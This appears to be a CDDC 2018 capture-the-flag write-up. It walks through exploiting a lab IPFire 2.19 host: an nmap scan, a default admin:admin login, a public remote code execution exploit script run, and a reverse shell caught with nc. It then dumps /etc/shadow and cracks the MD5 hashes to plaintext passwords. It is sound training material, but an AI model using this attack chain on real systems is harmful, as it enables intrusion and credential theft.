CDDC 2018: He Should Be Able To Inteprete the Entire Imperial Network

Category: Kamikaze Points: 77 Description:

  1. Exploit the target 10.50.0.199 and extract the password hash for the user id ending with 'ard' from a file inside the /etc/ folder.
  2. Submit the hashed password extracted from step 1 into response field below.
  3. Submit the Kamikaze Challenge by clicking on the Submit button.

Write-Up

So, starting off, we nmap the target,

$ nmap 10.50.0.199 -sV
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-01 16:26 +08
Nmap scan report for 10.50.0.199
Host is up (0.014s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2 (protocol 2.0)
444/tcp open  ssl/http Apache httpd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.74 seconds

Oh look, port 444. It also happens to be SSL-secured, so let's try and browse the URL to see what we find.

Screen-Shot-2018-06-01-at-4.48.08-PM

Oh, it's asking for a username and password! Let's try and see if we can try the good ol' admin:admin.

Screen-Shot-2018-06-01-at-4.48.57-PM

That's just not secure! What do we have, well, we have IPFire 2.19. A little of Google and we find a remote code execution exploit for this!

root@ctf:~# python 42149.py 
/usr/local/lib/python2.7/dist-packages/urllib3/connectionpool.py:858: InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
  InsecureRequestWarning)
[+] IPFire Installation is Vulnerable [+]
[+] Sending Malicious Payload [+]
/usr/local/lib/python2.7/dist-packages/urllib3/connectionpool.py:858: InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
  InsecureRequestWarning)

On our listening machine, we get a shell.

$ nc -nvlp 31337
listening on [any] 31337 ...
connect to [192.168.254.1] from (UNKNOWN) [35.198.199.50] 45684
bash: cannot set terminal process group (2200): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.3$ ls
aliases.cgi
atm-status.cgi
backup.cgi
bluetooth.cgi
cachemgr.cgi
chpasswd.cgi
connections.cgi
connscheduler.cgi
country.cgi
credits.cgi
ddns.cgi
dhcp.cgi
dns.cgi
dnsforward.cgi
entropy.cgi
extrahd.cgi
fireinfo.cgi
firewall.cgi
fwhosts.cgi
geoip-block.cgi
gpl.cgi
gui.cgi
hardwaregraphs.cgi
hosts.cgi
ids.cgi
index.cgi
ipinfo.cgi
iptables.cgi
logs.cgi
mac.cgi
mail.cgi
mdstat.cgi
media.cgi
memory.cgi
modem-status.cgi
modem.cgi
netexternal.cgi
netinternal.cgi
netother.cgi
netovpnrw.cgi
netovpnsrv.cgi
optionsfw.cgi
ovpnmain.cgi
p2p-block.cgi
pakfire.cgi
pppsetup.cgi
proxy.cgi
qos.cgi
remote.cgi
routing.cgi
services.cgi
shutdown.cgi
speed.cgi
system.cgi
time.cgi
traffic.cgi
updatexlrator.cgi
urlfilter.cgi
vpnmain.cgi
wakeonlan.cgi
webaccess.cgi
wireless.cgi
wirelessclient.cgi
wlanap.cgi

Now, the challenge asks for a hashed password extracted for the user ending with ard. Let's check /etc/shadow.

$ cat shadow
cat shadow
root:$1$kzT0KHxS$bf.vpPDCkMnl22Itm7ScB0:17570:0:99999:7:::
bin:x:16892:0:99999:7:::
daemon:x:16892:0:99999:7:::
mail:x:16892:0:99999:7:::
squid:x:16892:0:99999:7:::
ntp:x:16892:0:99999:7:::
mysql:x:16892:0:99999:7:::
ftp:x:16892:0:99999:7:::
vsftpd:x:16892:0:99999:7:::
rsyncd:x:16892:0:99999:7:::
stunnel:x:16892:0:99999:7:::
sshd:x:16892:0:99999:7:::
nobody:x:16892:0:99999:7:::
postfix:x:16892:0:99999:7:::
snort:x:16892:0:99999:7:::
logwatch:x:16892:0:99999:7:::
dnsmasq:x:16892:0:99999:7:::
cron:x:16892:0:99999:7:::
clamav:x:16892:0:99999:7:::
amavis:x:16892:0:99999:7:::
cyrus:x:16892:0:99999:7:::
filter:x:16892:0:99999:7:::
mldonkey:x:16892:0:99999:7:::
asterisk:x:16892:0:99999:7:::
samba:x:16892:0:99999:7:::
moveforward:$1$mnY/79Iy$D.uBUj//vcrQemD8ZNmSg.:17665:0:99999:7:::

What is this? Readable by a normal user? Now we have two hashes! Running it through unshadow and filtering it, we have two usable hashes to crack.

root:$1$kzT0KHxS$bf.vpPDCkMnl22Itm7ScB0:0:0:root:/root:/bin/bash
moveforward:$1$mnY/79Iy$D.uBUj//vcrQemD8ZNmSg.:1001:100::/home/moveforward:/bin/bash

Cracking it, we get the following,

root:spiderman
moveforward:moveforward

As the challenge is asking for the password hash for the user id ending with 'ard', we can just submit the hash as the flag,

Therefore, the flag is $1$mnY/79Iy$D.uBUj//vcrQemD8ZNmSg..

results matching ""

    No results matching ""